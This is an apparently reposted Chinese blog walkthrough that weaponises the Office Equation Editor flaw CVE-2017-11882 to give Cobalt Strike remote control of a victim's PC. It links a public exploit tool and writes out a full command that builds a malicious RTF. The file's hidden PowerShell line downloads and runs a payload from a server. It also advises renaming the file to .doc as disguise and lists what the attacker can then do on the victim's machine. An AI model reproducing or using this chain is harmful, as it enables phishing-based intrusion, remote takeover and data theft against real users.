• CVE-2017-11882 Office内存损坏漏洞利用


    CVE-2017-11882漏洞存在于Office的公式编辑器组件Eqnedit.exe中,GitHub上有EXP工具:https://github.com/unamer/CVE-2017-11882

    这篇文章主要介绍如何利用exp工具生成恶意rtf文件,并当目标打开该恶意文件时目标PC能够回连到我们的Cobalt Strike服务器,从而被远程控制。

    演示环境:Windows 10 + Office 2013

    有些版本的Office可能不成功,这个我也没测那么多。

    Office 2013:

    第1步:生成PowerShell Payload

    如下图利用Cobalt Strike生成PowerShell Payload:

    第2步:生成恶意rtf文件

    python2 CVE-2017-11882.py -c "powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.56.130:80/a'))"" -o test.doc

    下载GitHub上的Exp工具,然后执行上述命令生成恶意RTF文件。为了更好的伪装,我们可以把*.rtf后缀改为*.doc,这并不影响文件的打开。

    第3步:投递恶意文件并打开

    为了演示,我把恶意RTF文件放到Windows 10虚拟机中运行。

    第4步:木马上线

    双击打开恶意RTF文件之后,Cobalt Strike界面会有上线提示:

    到这一步,目标PC已经被我们远程控制了,可以上传/下载PC上的文件、截屏、提权等。

  • 相关阅读:
    团队冲刺第五天
    团队冲刺第四天
    学习进度条---第八周
    团队冲刺第三天
    团队冲刺第二天
    团队冲刺第一天
    学习进度条--第七周
    课堂练习--第7周(两人结对)
    学习进度条--第六周
    第一次 在Java课上的编程
  • 原文地址:https://www.cnblogs.com/dgjnszf/p/10887548.html
Copyright © 2020-2023  润新知